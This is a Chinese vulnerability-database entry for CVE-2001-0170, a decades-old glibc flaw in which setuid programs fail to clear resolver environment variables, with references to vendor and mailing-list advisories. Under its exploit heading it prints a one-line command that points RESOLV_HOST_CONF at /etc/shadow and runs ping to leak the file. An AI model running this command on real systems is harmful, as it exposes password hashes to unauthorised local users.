Glibc setuid/setgid文件泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105242 漏洞类型 未知
发布时间 1996-01-01 更新时间 2006-09-20
CVE编号 CVE-2001-0170 CNNVD-ID CNNVD-200103-082
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/317
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200103-082
|漏洞详情
Glibc2.1.9x及其之前的版本在执行setuid/setgid程序时,不正确清除RESOLV_HOST_CONF,HOSTALIASES,或RES_OPTIONS环境变量,本地用户可以利用该漏洞读取任意文件。
|漏洞EXP
setenv RESOLV_HOST_CONF /etc/shadow; ping adfas

# milw0rm.com [1996-01-01]
|参考资料

来源:BID
名称:2181
链接:http://www.securityfocus.com/bid/2181
来源:REDHAT
名称:RHSA-2001:001
链接:http://www.redhat.com/support/errata/RHSA-2001-001.html
来源:BUGTRAQ
名称:20010110[slackware-security]glibc2.2localvulnerabilityonsetuidbinaries
链接:http://archives.neohapsis.com/archives/bugtraq/2001-01/0186.html
来源:XF
名称:linux-glibc-read-files
链接:http://xforce.iss.net/static/5907.php
来源:BUGTRAQ
名称:20010110GlibcLocalRootExploit
链接:http://archives.neohapsis.com/archives/bugtraq/2001-01/0131.html